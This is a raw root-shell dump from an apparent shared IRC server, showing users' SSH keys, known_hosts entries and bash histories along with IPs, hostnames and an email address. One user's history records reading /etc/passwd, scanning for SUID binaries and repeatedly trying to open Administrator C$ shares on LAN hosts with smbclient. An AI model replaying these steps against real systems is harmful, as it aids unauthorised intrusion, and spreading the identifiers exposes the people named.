NsbIez9+bB1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyT
eBHEeuM=
zloche.net ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDX
ZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRt
QDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fcla
QaSichE=
66.168.220.212 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nFkhEnqjRxLMWLxfkDdxeKD
Ms5orhRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtTAWxe5ZeCDKL4phDbubx
DIJvFKcTfNi+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZk8Ia3v6AIHsoB5x/y
ljSwznrSDWuVwn5LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHqMyej98cRVvY/iAT
I5SrFRCfWNkC7gH/oFxXM/bKB94H7TZ4W6wtfdjmkBrYxojDbUKKEfd1LywcJCTY
xab8usl+Q39uYvqTfXwJDIYX+BE810BNmXi0QA6WlYUOpMJj9Q==
craplandia.org,74.69.17.126 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA5vHP/DNtJSXwf+2YNhLD9MX2HkcuNqhGNtmJ
6/sis9MTAQTEqnTi0Nw4yaoQL0qFM7nZkS8OGQI0X55c0Ud0JEXjbXuikZEFUtzr
2A+up19wewbpMsMRac87r+vtU218ozOUjYuurhJwF58DhrUKLrTwa5hl8pRFTifS
qhrhKCMBdQreHkmR8GoHIohMdkaPyIACKBgAaUDFX4VHoYW7AbJlO/3cJLxWEHoU
kRM9aHi6tfqXt69e8W1LGXCEI83xUyjOT+ndCm3x+w/Scuw7kBrjSYg0CXaxDTR5
l8lBMJAdenr9CFWPMKbeOLrvdAlpPewJ5EKRSxY4sWZqZwaqWQ==
[root@localhost .ssh]# cd ..
[root@localhost DJDD]# cat .bash_history
ls
dir
telnet
passwd
cd root
ls
dir
putty
lcd c:dir
lcd c:open
lcd c:open
lcd c:ls
ls
talk Raster
root Raster
"talk Raster
sup dude
"talk Raster"
talk root
"talk root"
talk root wuts up
talk root
talk root
talk root
kibitz root
talk root
brb
talk root
talk
talk root {pts/6] test
talk root (pts/6) test
talk
[DJDD@localhost ~]$ talk
Usage: talk user [ttyname]
help
cd ..
lcd c:help
pwd
cd /
pwd
pwd all
read
pwd -PL
ping 66.168.220.204
wall root test
wall root hows it goin Raster
help
talk
well
well root
wall root
wall root Raster, kick DJ_Double_D or DJDD^Lap will you?
telnet
wall root u there raster?
telnet
wall root i know, i forgot to close them down when i left this morning
wall root ive tried emailing CdP to kick them
wall root are you on irc now?
whay was it banned?
wall root why was it banned?
wall root is there a timeout period for this kind of thing or will an ircop
have to unban the connection?
wall root aorry about this, when i tried to start mIrc up it went crazy tring
to connect to the serve4r
wall root sorry*
cdpirate@gmail.com
wall root from all the connections or is something else going on?
wall root thru ssh?
wall root lemme see if i can find something
wall root check this out http://tinyurl.com/pk963
wall root kk
wall any luck?
wall
wall has the connection been unban
wall root
kk
cd ..
ls
cd ..
ls
cd media
ls
cd ..
cd etc
ls
cd ..
ls
cd mnt
ls
cd ..
passwd
ls
pwd
cd ..
cd ..
ls
cd etc
ls
cd passwd
cat passwd
pwd
ls
cat passwd-
cat passwd.old
cat passwd.OLD
ssh sillyrabbit
irssi
wall GOOOOOODDDDD MORNING VIETNAMirssiirssiirssi
telnet
whois liveits.com
ls -a
mkdir .ssh
cd .ssh
pico authorized_keys
vi authorized_keys
cat authorized_keys
ls -la
chmod o-r .
chmod o-r ..
chmod og-w authorized_keys
ls -la
ls -la .ssh
chmod og-rwx .ssh
ls -la .ssh
ssh djdd@liveits.com -v
ssh djdd@www.liveits.com -v
ssh djdd@www.liveits.com -v
ls -la .ssh
cp .ssh/authorized_keys .ssh/id_dsa.pub
ls -la .ssh
ssh djdd@www.liveits.com -v
ssh djdd@zloche.com -v
ssh djdd@zloche.com -v _A
ssh djdd@zloche.com -v -A
xterm
will work
it crashing?
ok you need pcmcia for anything to get online?
pico tmp
vi tmp
less /proc/interrupts
vi tmp
screen irssi
exit
exit
screen
screen -raAd
exit
screen -raAd
ftp
screen -raAd
exit
screen -raAd
exit
ssh zloche.net
uptime
17:15:17 up 17:14, 9 users, load average: 0.00, 0.00, 0.00
help
stats'
stats
exit
ssh 66.168.220.212
ping 66.168.220.212
ssh 66.168.220.212
uptime
sudo adduser djdd
ping 66.168.220.212
telnet
exit
irssi
exit
irssi
exit
ssh 66.168.220.212
ping 66.168.220.212
ping 66.168.220.214
irssi
exit
irssi
screen irssi
exit
ls
cd ..
dir
cd ..
dir
cd etc
ls
cd ..
cd ..
alias
exit
exit
alias
man alias
alias=djdd
ssh 66.168.245.176 djdd
ssh craplandia.org djdd
logout
screen irssi
exit
screen irssi
exit
screen -raAd
screen -raAd
screen -raAd
screen -raAd
exit
screen -raAd
screen -raAd
screen -raAd
exit
screen -raAd
exit
ping irc.zloche.net
exit
screen -raAd
exit
exit
screen -raAd
screen irssi
screen -raAd
screen -raAd
screen -raAd
exit
screen -raAd
exit
ssh zloche.net
irssi
exit
screen -raAd
exit
screen -raAd
screen irssi
screen -raAd
exit
screen -raAd
exit
screen -raAd
screen -raAd
exit
screen -raAd
screen -raAd
screen -raAd
exit
screen -raAd
exit
screen -raAd
screen -raAd
screen -raAd
exit
screen -raAd
exit
screen -raAd
exit
screen -raAd
exit
screen -raAd
exit
screen -raAd
screen -raAd
screen -raAd
screen -raAd
screen -raAd
exit
screen -raAd
screen -raAd
screen -raAd
exit
screen -raAd
exit
screen -raAd
exit
screen -raAd
exit
screen -raAd
screen -raAd
exit
screen -raAd
exit
top
screen -raAd
screen irssi
exit
screen irssi
screen -raAd
exit
screen -raAd
ping pastecode.com
ping www.pastecode.com
screen -raAd
msg strayfe yo
message
help
screen -raAd
who
write strayfe pts/8 yo
write strayfe yo
write strayfe pts/8
screen -raAd
screen -raAd
w
write strayfe pts/8
screen -raAd
exit
screen -raAd
exit
screen -raAd
exit
screen -raAd
/screen irssi
screen irssi
exit
screen -raAd
exit
screen -raAd
exit
screen -raAd
screen irssi
screen -raAd
screen -d -r 10194.pts-7.localhost
screen -d -r 6355.pts-1.localhost
exit
top
exit
screen -d -r 6355.pts-1.localhost
exit
ls
pwd
sdlkfjl;sdkl;fmsd'a
ls
cd ..
cd ..
ls
sudo tail /var/log/messages
cd etc
ls
cd ..
which denyhosts
locate denyhosts
w
w
exit
[root@localhost DJDD]# cd ~stax
[root@localhost stax]# ls -alh
total 40K
drwxr-xr-x 3 stax stax 4.0K Mar 31 17:55 .
drwxr-xr-x 26 strayfe strayfe 4.0K May 14 04:32 ..
-rw------- 1 stax stax 778 Jun 8 01:16 .bash_history
-rw-r--r-- 1 stax stax 24 Mar 21 17:32 .bash_logout
-rw-r--r-- 1 stax stax 191 Mar 21 17:32 .bash_profile
-rw-r--r-- 1 stax stax 124 Mar 21 17:32 .bashrc
-rw-r--r-- 1 stax stax 120 Mar 21 17:32 .gtkrc
drwx------ 2 stax stax 4.0K Mar 31 18:31 .irssi
-rw-r--r-- 1 stax stax 658 Mar 21 17:32 .zshrc
[root@localhost stax]# cat .bash_history
passwd
w
write root pts/2
w
sudo su ircd
ping tbm.zloche.net
w
ls
w
w
w
w
sudo su ircd
mysql
mysql -u root -p
sudo su ircd
sudo su
sudo su ircd
w
asd
ls
w
irssi -c localhost
ls /
cd /www/
ls
cd raster/
ls
cd ..
find --help
find ./ left.png
find left.png
cd /
find left.png
locate left.png
cd /www/htdocs/left.png
cd /www/htdocs/
ls
pwd
mkdir Stax_Temp
cd ~ircd/
ls
cd services
ls
du -csh
killall services
ls
tar -cf forstax.tar *.db *.sql modules anoperc/ languages/ list* mydbgen logs/
serviceschk tools/
mv forstax.tar /www/htdocs/Stax_Temp/
ls
w
ls
sudo bash
w
killall services
sudo su ircd
w
who
w
w
w
w
w
w
ping server4
ping server4.zloche.net
w
ping www.zloche.net
ping server2.zloche.net
ping irc.rasterized.net
w
less /proc/cpuinfo
w
w
w
ls
sudo bash
su ircd
sudo bash
[root@localhost stax]# cd ~gumbie/
[root@localhost gumbie]# ls -alh
total 13M
drwxr-xr-x 15 gumbie gumbie 4.0K Jun 8 22:54 .
drwxr-xr-x 26 strayfe strayfe 4.0K May 14 04:32 ..
-rw------- 1 gumbie gumbie 17K Jun 9 00:55 .bash_history
-rw-r--r-- 1 gumbie gumbie 24 Sep 11 2006 .bash_logout
-rw-r--r-- 1 gumbie gumbie 191 Sep 11 2006 .bash_profile
-rw-r--r-- 1 gumbie gumbie 199 Jun 6 22:16 .bashrc
drwxr-xr-x 2 gumbie gumbie 4.0K Sep 16 2006 Desktop
drwx------ 2 gumbie gumbie 4.0K Sep 16 2006 .elinks
drwx------ 4 gumbie gumbie 4.0K Sep 18 2006 .gconf
drwx------ 2 gumbie gumbie 4.0K Oct 5 2006 .gconfd
drwxrwxr-x 3 gumbie gumbie 4.0K Sep 16 2006 .gnome
drwx------ 7 gumbie gumbie 4.0K Sep 16 2006 .gnome2
drwx------ 2 gumbie gumbie 4.0K Sep 16 2006 .gnome2_private
drwxr-xr-x 2 gumbie gumbie 4.0K Sep 16 2006 .gstreamer-0.8
-rw-r--r-- 1 gumbie gumbie 120 Sep 11 2006 .gtkrc
-rw-rw-r-- 1 gumbie gumbie 135 Sep 16 2006 .gtkrc-1.2-gnome2
-rw------- 1 gumbie gumbie 191 Sep 16 2006 .ICEauthority
drwxrwxr-x 2 gumbie gumbie 4.0K Sep 20 2006 Incoming
drwxrwxr-x 4 gumbie gumbie 4.0K Sep 18 2006 .mozilla
-rw------- 1 gumbie gumbie 624 Mar 11 05:20 .mysql_history
drwxr-xr-x 3 gumbie gumbie 4.0K Sep 16 2006 .nautilus
-rw------- 1 gumbie gumbie 0 Sep 16 2006 .recently-used
-rw------- 1 gumbie gumbie 497 Sep 16 2006 .rhn-applet.conf
-rwxr--r-- 1 gumbie gumbie 12M Sep 27 2006 screen1.bmp
-rw-rw-r-- 1 gumbie gumbie 14 Sep 18 2006 .screenrc
drwx------ 2 gumbie gumbie 4.0K Feb 28 16:12 .ssh
-rw-rw-r-- 1 gumbie gumbie 0 Dec 1 2006 test
-rw-rw-r-- 1 gumbie gumbie 6 Sep 11 2006 tmp
-rw-r--r-- 1 gumbie gumbie 12K Sep 11 2006 .tmp.swp
-rw------- 1 gumbie gumbie 1.6K Feb 28 16:12 .viminfo
-rw------- 1 gumbie gumbie 201 Jun 8 22:54 .Xauthority
drwx------ 3 gumbie gumbie 4.0K Sep 18 2006 .xchat2
-rw-r--r-- 1 gumbie gumbie 658 Sep 11 2006 .zshrc
[root@localhost gumbie]# cd .ssh
[root@localhost .ssh]# ls -alh
total 16K
drwx------ 2 gumbie gumbie 4.0K Feb 28 16:12 .
drwxr-xr-x 15 gumbie gumbie 4.0K Jun 8 22:54 ..
-rw------- 1 gumbie gumbie 2.9K Sep 11 2006 authorized_keys
-rw-r--r-- 1 gumbie gumbie 2.2K Mar 24 03:06 known_hosts
[root@localhost .ssh]# cat authorized_keys
ssh-dss
AAAAB3NzaC1kc3MAAACBAIkoc5RisBTJmtAUFmSedLFXUOtADHiPUNVgvS3aE
J/EauJM8Bvldd7AlNL2IoW+BVyI9qQ9F5u7ck925L3LFO2DySquqTUvu6wC1h
cG+QJmLvXWdZlp7qqiaVhQPspf++3PnpL/9W3Ls06CJTkRpWFb5pyBeB5srYv
+pO26i1xfAAAAFQCDQHjFR6JYK2BMfYzeqv5el4fsJQAAAIBQZW0fqGNmIxFA
NmeHcAWUlow8cwzH3bYltUHxYqFmogv7KhXppAzmDuptjqxpAAsiXResTflS4
84DieIwssz8z9IB+4hGITpnPOHQT1ddxIq614MbkNlIMbCDXA1Ikbf0UNbJbN
5fTd3JBZWU93lp2blJ+0VcmI2o3SXLZJgiLwAAAIAMXILSm58KHdeCaeNb/Ed
SXAqnC7ZQ3LElNdgv0KX2d6t2ec4MWXjoicuIjTE5ZAh4m6e+vVP3yaxSGaxt
Z6TZKtS1P2Ku0MnYOdzer5y7C1EcQXyshYN9uikNEp3yiOk/n2mbHv8BrJr/Q
/0FqWVn3FDzJ2O/szt7iXrx+67IYg==
gumbie@apache.rmachine.net
ssh-dss
AAAAB3NzaC1kc3MAAACBAMhBcEfcxCSsSXvoeP9FA+oyHyDN8N4bH8WMn62ST
dnsRGo1BGQNXYw3+wySs7L9XilUOC1Tnorkc9qsgZnsWfujfTRU2WOvdZ+Pfk
ZFhyser/xwMbmCNjovC1QONmq+UfvHoisHUPHymSIcL1jN704qB69JOGYwQy8
YndPvaJlbAAAAFQCc1KfmY/qwIH/Z0RCTTFiX0DgzIQAAAIAlVsYB57+E7JUv
sc54+6lnzAb84NlzS3aIOI+G4ctrXjQ962RxBEn1YezFH0xfPpnN15C3fTtU+
NU/BqWX0LplGMK7xkvelQmPzPINebrWsAGQewWelPfqWABZ+9UIv7KbpnYYmG
91aka9Xtdj7+3b0Xaq5wpQjGTrvlEhUnSOewAAAIBdoaDNivxRzV5oK310p4W
p0PGzfqjzB0glwzTi0zwvs6nTdA4qqgh1HaU9SYtpUwTq9tNBQs5cftTZS0Ou
yYfedUtt2DjM6S07Cj2zkh1C1Obd4M+ABD9LNRigSfyi9wGwtxXpMk7gwTkS1
msyqHVD5kSxRTmyUl40QukqiAN5PA==
"gumbie@toshiba_dsa"
ssh-dss
AAAAB3NzaC1kc3MAAACBAIu2cdN3RRzMDD7H45m3ycrDZNoiQpm2NAC1fqc6Ht
Xxt1yE2k5MxNKj2+PJJ5hdPghNZJy7+yD+gsEnbPpEY670yp0WRqF7Pea55zOr
5D8LUt7ONRqSkoMiXCSxXOzbbgpH/f2bucJpeeXU7N4sCsFTwCcs+wOjkWw45W
OOYhYRAAAAFQDVOp3utFXwVFKdWVhF+PWOVFo1UQAAAIAjZoT8OWf+V1myE8qX
X53ptpFz+mkz9Cke/nXnCop7iyWIRMwQyaHiB/m4QFj37jlrVBm3jW185gTJuH
cBecpnLtT+1tZE8v52uvHK1b4Tk+tGZSAnXyFCd2527pzu4UmD89Q3HgSJkPWa
imtiR+upc/7lAda6Vd5gGO6WgSlUIwAAAIBdK2rixeRLzk0OP91F1LyEP6AG7x
K7fcjSTPNdQBNx01jk3B2hT/EQZxp5To+F3UCsjqCSlA8+Hzc2BicLfEmL8E+s
WgZGuAo/tREPeLT8YWPL+JEBK5SJBHpWK4YyGw2pw2wpiecg4X6NMDH/SBDo8d
rhsDmHKIiH0AmWyeYGxw==
"gumbie@guinness"
ssh-dss
AAAAB3NzaC1kc3MAAAEBAKunfYaKQoO/n2Hd/tQi+BWaB3asXeiG2pHrWXsysM
PFucW5dtzupXlyNQVw7Ul6F9DIf0i2mq0pEYRG3DOwE6WpSRzoaVLwIgreWqfs
eyOHPj1VVEpqndD1MBN8DB7KhUqmdcZaA0ZHKckfKQ32jNwQzUv8dLiFpxrMgG
4NHKnxeljB3KEXrvfnaLQKzjZM493Kyz2YRrYRRDEmIV9gDXyf7K7tTfTnEH3Q
lkZntl2EuT7DAwosVp65Sc9eqg/bTbFPwFV1NBtCLHYqhwbr2o4T47K6p52rle
Ilc0nKEuIwDC7UXYF/NYK7LlET0Hs2UeORIAqCVpEM9GLtqD86mOEAAAAVALbq
DYEBLteFV2KXeFxSgg1dTi7vAAABAByEI62hyW1nvzlpZDoYp2IBQfS+VfDFPN
oxA4ot90KgL0y1cF3HOYVfcEDPj5ONK8246/swSCGgQt8twutXsjIo+xiuYO5h
6cPLqRTeycMUrP2QQMMxZXuXMJeXLJWJ+e1n5i+vrAJf6X2T0TI+ry6X9u4gtR
5uInW58sNAERtsaxwj+H+ifDIaCFewylmTIOp5A1equsNlHis2B0j7VBLerk7m
aRGOCzrc4jdA+ztM5tJaUy8x83bEYiXDOZoeqVmoF2gxTenZiOmQBHDRE4+WlJ
ZCj51eS8r/8zzSgGMsD0TY5jpcU5zocAi1cd3Woz6oZa8XZPoFke+rr9zK5TwA
AAEBAKG8GciKXT79FOrnntiM3fGqQcI21e6w0GczRX6Q1bie9te7c8Z69HIWHe
J43MKAzWi7Zz8rPcHAD30VW7bkgGyGHaPBz79ACW5u/A6gCLjYHM/A+RM/4fGI
siVa90Bb6k1nGUkzRNpp1l+xKrQG9uc8cJXMO5QAuup7FXnZFjMQ3pNs7y9HhC
EsSuAIOsCdvHOgzHW602N1DV76jALAIA1UbY8vv82o5dy+BNxRhjsAOpT17VqJ
k8SOp+BIpiEIy/gnfk6lvbHxev2DjM97pRWnmb0lFkNNptlXz7GPh8TAaMUqXo
cMoVpC4Dqz2TUyNALyrZQgtnX+vdfnSjSsyzM=
"gumbie@cyber"
[root@localhost .ssh]# cat known_hosts
localhost ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe
0e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj
4AwxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5
CpHMuAKU70=
71.192.64.22 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAsRBHrWAwTKSWF0DdzGeLaWZYSGFjdPmtH+hi
g6rozw5akKT+l7JxMcPi0iW0kuImhOh/D7cVh7BlMQc5RjvrOigxN6RtrrUzE5iU
hdHRdlbQ5XWaPJQZLH6nQMnCvtGsj432OMi5NiWAs8QUp0duiOUPCQxq3hV/wq4M
TqlP/Nk=
192.168.1.103 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAxOTEuFhSKkLOas+na3mZV2LKlWFFPKtu9rxg
VBEIIY4GyMgLaG8t72tjhKctW/LlJ4JZddpz3Kp4voOPupio9Yo49gyQXRxpPXQ/
Polx1pg7UqL6rplmNrBOKDT6vvEIT2vUUjzOqVDQUXWh240L9IXDSFpBKVq2aFhl
qPGvxdqqlAe8O7B/qP0CwZLk77UnMqdUKLO2/j1Wd0thyK30KYyAxaZzC5ikAPqL
+n3vxxXHypSh36wI7VLTGhfh5apo7++tYJJmb9hJYePHrTSM5fYGjuiYWzkqMZB0
5XpP+0VA4arEiYIu+5edaG2FhbWvsY5uUzteHx1z9SAk6YIocw==
192.168.1.8 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAxOTEuFhSKkLOas+na3mZV2LKlWFFPKtu9rxg
VBEIIY4GyMgLaG8t72tjhKctW/LlJ4JZddpz3Kp4voOPupio9Yo49gyQXRxpPXQ/
Polx1pg7UqL6rplmNrBOKDT6vvEIT2vUUjzOqVDQUXWh240L9IXDSFpBKVq2aFhl
qPGvxdqqlAe8O7B/qP0CwZLk77UnMqdUKLO2/j1Wd0thyK30KYyAxaZzC5ikAPqL
+n3vxxXHypSh36wI7VLTGhfh5apo7++tYJJmb9hJYePHrTSM5fYGjuiYWzkqMZB0
5XpP+0VA4arEiYIu+5edaG2FhbWvsY5uUzteHx1z9SAk6YIocw==
www.zloche.com,81.93.5.180 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4
OrbUK7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2
NsbIez9+bB1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyT
eBHEeuM=
www.zloche.net,80.248.208.223 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDX
ZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRt
QDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fcla
QaSichE=
zloche.net ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDX
ZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRt
QDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fcla
QaSichE=
irc3.zloche.net,213.251.160.26 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhX
x05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qH
PS3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwG
j6bIiuE=
[root@localhost .ssh]# cd ..
[root@localhost gumbie]# cat .bash_history
exit
passwd
mkdir .ssh
cd .ssh
scp www.zloche.net -v
scp www.zloche.net:.ssh/authorized_keys ./authorized_keys
passwd
passwd
passwd
passwd
passwd
ls -la
chmod og-rwx .
cat /etc/resolv.conf
locate named
w
/sbin/ifconfig
/sbin/route -n
dig irc.rmachine.net
dig irc.humpmeg.net
cat /etc/sysconfig/network-scripts/ifcfg-eth0
w
screen -e^Tt
mesg
w
talk Raster
ktalk Raster
man -k talk
cp .ssh/authorized_keys ~ircd/.ssh
w
hostname
hostname -f
hostname -l
hostname -f
ssh 71.192.64.22 -v
scp gumbie@71.192.64.22:/new2/unreal.tgz ./unreal.tgz
ls
ok...
cp unreal.tgz ~ircd
cp unreal.tgz ~ircd/src
control-a then 1
it is ctrl-t
ircii
scp gumbie@71.192.64.22://usr/bin/kibitz ./kibitz
w
kibitz -tty pts/7 Raster
chmod uog+rx kibitz
ls
./kibitz -tty pts/5 Raster
expect
ls -l `which screen`
w
screen -ls
screen -ls
pico tmp
vi tmp
screen -ls
ps auxww | grep -i screen
w
vi tmp
ls -l `which screen`
ls -l `which screen`
ls -l `which screen`
ls -l `which screen`
vi tmp
ps x
screen -x
screen -ls
ls
ps xauww | grep screen
w
w
ls /
ls -l /var/run/screen
stat /var/run/screen/S-gumbie/
chmod 0755 /var/run/screen/S-gumbie/
stat /var/run/screen/S-gumbie
screen -ls
chmod 0755 /var/run/screen
ls -l /var/run/screen
ls -la /var/run/screen
ls -la `which screen`
screen -r
screen -r gumbie 1802.pts-1.localhost
screen
ls -la `which screen`
screen -x
screen -R
ps x
ps xu
mesg
screen -r
screen -x
screen -R
screen -f
screen -h
screen -D
screen -m
screen -RR
screen -Ra
screen -a
screen
kill -1 -1
su - ircd
ls /home
telnet localhost
ssh -p 443 ircd@localhost
w
su - ircd
screen -ls
ps x
ps xau
ps xau | grep screen
ps xau | grep -i screen
screen
ls -la /var/run/screem
ls -la /var/run/screen
stat /var/run/screen/S-Raster/
stat /var/run/screen/S-Gu
stat /var/run/screen/S-gumbie/
screen -x
screen -r
screen -d
screen -
screen
screen -a
id
sudo su -
w
su - ircd
su - ircd
su - ircd
cat .bash_history
w
ps auxww | less
w
screen -ls
w
top
w
ps auxww | grep dead
cat /etc/passwd
ls /home/deadlyacid/
ls -a /home/deadlyacid/
ls -al /home/deadlyacid/
ls -al /home
ls -al /home/mrcheese/
ls -al /home/ircd/
ls -al /home/Raster/
ls -al /home
ls -al /home/NeoKat/
ls -al /home/.ssh
ls -al /home/lirc-0.8.0/
ls -al /home/lirc-0.8.0/tools/
ls -al /home/lirc-0.8.0/remotes/
find /home/lirc-0.8.0 -suid
man find
find /home/lirc-0.8.0 -perm +u+s
find /home/lirc-0.8.0/* -perm +u+s
find /home/lirc-0.8.0/* -perm +u
find /home/lirc-0.8.0/* -perm +s
find /home/lirc-0.8.0/* -perm +S
find /home/lirc-0.8.0/* -perm u+s
find /home/lirc-0.8.0/* -perm +u+s
find /home/lirc-0.8.0/* -perm +u+S
find /home/lirc-0.8.0/* -perm +u+x
find /home/lirc-0.8.0/* -perm +u+s
find /home/lirc-0.8.0/* -perm +g+s
find / -perm +g+s
find / -perm +u+s 2> /dev/null | less
w
screen
ls -l /var/run/screen/
ls -la /var/run/screen/
ls -la `which screen`
id
screen -h
screen -m
screen -r
screen -X id
screen -wipe
w
screen -x
screen -ls
w
talk Raster
write Raster
w
write Raster
mesg
host irc.rmachine.net
tty
w
ssh -l ircd localhost -p 443 -v
ls -la ~ircd/.ssh
ls -la ~ircd/.ssh/*
ls -la ~ircd/.ssh/authorized_keys
chmod uog+r ~ircd/.ssh/authorized_keys
ls -la ~ircd/.ssh/authorized_keys
cat ~ircd/.ssh/authorized_keys
chown ircd ~ircd/.ssh/authorized_keys
w
w
screen -ls
w
who
tty
ps x
w
ps auxww|less
ls /net
ls /mnt
ls /
ls /net/*
ls /net
ls /misc
ls /net/localhost
ls /net/localhost/
uname -a
showmount -e
smbclient -L localhost
smbclient -L
/sbin/arp -en
/sbin/ifconfig
screen -x
w
sudo su -
ls
ls /bin/bash
ls -l /bin/bash
ls -l /sbin/bash
ls -l /tmp/bash
ls -l /dev/bash
locate bash
find / -name "bash"
find / -name "bash" 2>/dev/null
ssh -l ircd
localhost -p 443 -v
w
w
mesg
write Raster
write Raster
w
w
ps aux
telnet localhost 6667
/sbin/ifconfig
w
mesg
write Raster
w
w
smbclient -L
smbclient -L localhost
arp -an
/sbin/arp -an
ping 192.168.1.100
ping 192.168.1.101
ping 192.168.1.102
ping 192.168.1.103
/sbin/arp -an
smbclient -L -I 192.168.1.100
smbclient -L xp -I 192.168.1.100
smbclient -L xp -I 192.168.1.101
smbclient -L xp -I 192.168.1.102
smbclient -L xp -I 192.168.1.103
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -UAdministrator
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -p
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -P
smbclient -h
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -N
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -n MSHOME -N
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -n MSHOME
smbclient \\\\KARENMAC\\C$ -I 192.168.1.102 -U Administrator -n WORKGROUP
smbclient -l KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP
smbclient -l KARENMAC -I 192.168.1.103
smbclient -l KARENMAC -I 192.168.1.101
smbclient -L KARENMAC -I 192.168.1.101
smbclient -L KARENMAC -I 192.168.1.102
smbclient -L KARENMAC -I 192.168.1.103
smbclient -L KARENMAC -I 192.168.1.104
smbclient -L KARENMAC -I 192.168.1.105
smbclient -L KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP
smbclient -L KARENMAC -I 192.168.1.103 -U Administrator -n WORKGROUP
smbclient -L KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP
w
w
w
top
ps auxww | grep Raster
ps auxww | grep vnc
echo $DISPLAY
xconsole
xconsole
xconsole
xhost
xhost +
xconsole
who
w
ps auxww | grep Raster
/usr/bin/gnome-session
w
w
smbclient -L xp -I 192.168.1.102
smbclient -L xp -I 192.168.1.102
smbclient -L KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP
smbclient -L xp -I 192.168.1.100
smbclient -L xp -I 192.168.1.101
smbclient -L xp -I 192.168.1.102
smbclient -L xp -I 192.168.1.103
smbclient -L xp -I 192.168.1.104
smbclient -L xp -I 192.168.1.105
smbclient -L RASTERING -I 192.168.1.102
smbclient \\\\RASTERING\\C$ -I 192.168.1.102
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator
man smbclient
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -W mshome
smbclient -L RASTERING -I 192.168.1.102
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -W RASTERING
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -N RASTERING
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -n RASTERING
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U RASTERING\Administrator
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U RASTERING\Administrator -N
smbclient -L RASTERING -I 192.168.1.102
smbclient \\\\RASTERING\\Shared -I 192.168.1.102 -U RASTERING\Administrator -N
smbclient -L RASTERING -I 192.168.1.102
smbclient -h
lpq
lpstat
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Raster -n RASTERING
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Raster -n RASTERING
smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Raster -n RASTERING
smbclient -L RASTERING -I 192.168.1.102 -U Raster
smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING
smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -N
smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -p
smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -P
smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -k
smbclient -L RASTERING -I 192.168.1.102 -U Raster -k
smbclient -L RASTERING -I 192.168.1.103 -U Raster -k
smbclient -L RASTERING -I 192.168.1.101 -U Raster -k
/sbin/arp -ae
smbclient -L RASTERING -I 192.168.1.100 -U Raster -k
ping -b 192.168.1.255
/sbin/arp -ae
smbclient -L RASTERING -I 192.168.1.181 -U Raster
